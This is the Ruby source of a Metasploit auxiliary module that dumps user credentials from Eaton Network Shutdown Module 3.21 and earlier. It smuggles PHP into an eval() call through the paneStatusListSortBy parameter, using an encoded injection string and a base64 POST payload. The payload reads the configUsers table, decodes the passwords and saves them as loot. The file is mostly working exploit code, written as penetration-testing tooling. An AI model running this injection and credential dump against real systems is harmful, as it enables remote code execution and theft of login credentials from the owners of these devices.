Path: blob/master/modules/auxiliary/gather/eaton_nsm_creds.rb
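##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Network Shutdown Module sort_values Credential Dumper',
        'Description' => %q{
          This module will extract user credentials from Network Shutdown Module
          versions 3.21 and earlier by exploiting a vulnerability found in
          lib/dbtools.inc, which uses unsanitized user input inside a eval() call.
          Please note that in order to extract credentials, the vulnerable service
          must have at least one USV module (an entry in the "nodes" table in
          mgedb.db).
        },
        'References' => [
          ['OSVDB', '83199'],
          ['URL', 'https://web.archive.org/web/20121014000855/http://secunia.com/advisories/49103/']
        ],
        'Author' => [
          'h0ng10',
          'sinn3r'
        ],
        'License' => MSF_LICENSE,
        'DisclosureDate' => '2012-06-26',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(4679)
      ]
    )
  end

  # Executes arbitrary PHP on the target through the eval() in lib/dbtools.inc.
  #
  # The paneStatusListSortBy GET parameter closes the string the target feeds
  # to eval() (%22%5d -> `"]`), appends a second eval() that base64-decodes
  # the real payload out of a randomly named POST field, and comments out
  # whatever follows (%29;%2f%2f -> `);//`). This is full code execution on
  # the appliance, not just a read: anything passed in +code+ runs as the
  # web server user.
  #
  # @param code [String] PHP source to run on the target
  # @param opts [Hash] unused; kept so existing callers keep working
  # @return [Rex::Proto::Http::Response, nil] the response, or nil when no
  #   response was received
  def execute_php_code(code, opts = {})
    param_name = Rex::Text.rand_text_alpha(6)
    padding = Rex::Text.rand_text_alpha(6)
    php_code = Rex::Text.encode_base64(code)

    # NOTE(review): this value is already percent-encoded, and send_request_cgi
    # normally encodes vars_get values itself; confirm against a live target
    # that the server really sees `"], eval(...));//` before changing it.
    url_param = "#{padding}%22%5d,%20eval(base64_decode(%24_POST%5b%27#{param_name}%27%5d))%29;%2f%2f"

    send_request_cgi(
      'uri' => '/view_list.php',
      'method' => 'POST',
      'vars_get' => {
        'paneStatusListSortBy' => url_param
      },
      'vars_post' => {
        param_name => php_code
      },
      'headers' => {
        'Connection' => 'Close'
      }
    )
  end

  # Dumps the configUsers table from the target's database.
  #
  # The injected PHP prints every row as
  #   <pattern><login><pattern><base64-decoded pwd><pattern>
  # with +pattern+ a random 10-digit marker, then die()s so nothing else is
  # rendered. Rows are emitted back to back with no separator, so the
  # response is parsed with the actual marker and non-greedy captures. The
  # previous generic, greedy /\d{10}(.*)\d{10}(.*)\d{10}/ merged every row
  # into one record and mis-split any login or password containing ten
  # consecutive digits.
  #
  # @return [Array<Array(String, String)>] [login, password] pairs; empty when
  #   the request fails or the response carries no marked records (never nil,
  #   so callers can call #empty? directly)
  def read_credentials
    pattern = Rex::Text.rand_text_numeric(10)
    users_var = Rex::Text.rand_text_alpha(10)
    user_var = Rex::Text.rand_text_alpha(10)
    php = <<~EOT
      $#{users_var} = &queryDB("SELECT * FROM configUsers;");
      foreach($#{users_var} as $#{user_var}) {
        print "#{pattern}".$#{user_var}["login"]."#{pattern}".base64_decode($#{user_var}["pwd"])."#{pattern}";
      } die();
    EOT

    print_status("Reading user credentials from the database")
    response = execute_php_code(php)

    unless response && response.code == 200
      print_error("Failed: Error requesting page")
      return []
    end

    marker = Regexp.escape(pattern)
    # /m so a password containing a newline does not break the record.
    response.body.to_s.scan(/#{marker}(.*?)#{marker}(.*?)#{marker}/m)
  end

  # Entry point: dumps the credentials, prints them as a table and stores
  # the table as CSV loot.
  def run
    credentials = read_credentials
    if credentials.empty?
      print_warning("No credentials collected.")
      print_warning("Sometimes this is because the server isn't in the vulnerable state.")
      return
    end

    cred_table = Rex::Text::Table.new(
      'Header' => 'Network Shutdown Module Credentials',
      'Indent' => 1,
      'Columns' => ['Username', 'Password']
    )
    credentials.each { |login, password| cred_table << [login, password] }

    print_line
    print_line(cred_table.to_s)

    # NOTE(review): the pairs are only written to loot; consider also
    # reporting them through the credential API so other modules can reuse them.
    path = store_loot(
      'eaton.nsm.credentials',
      'text/csv',
      datastore['RHOST'],
      cred_table.to_csv,
      'eaton_nsm_creds.csv',
      'Eaton Network Shutdown Module Credentials'
    )
    print_good("Credentials saved in: #{path}")
  end
end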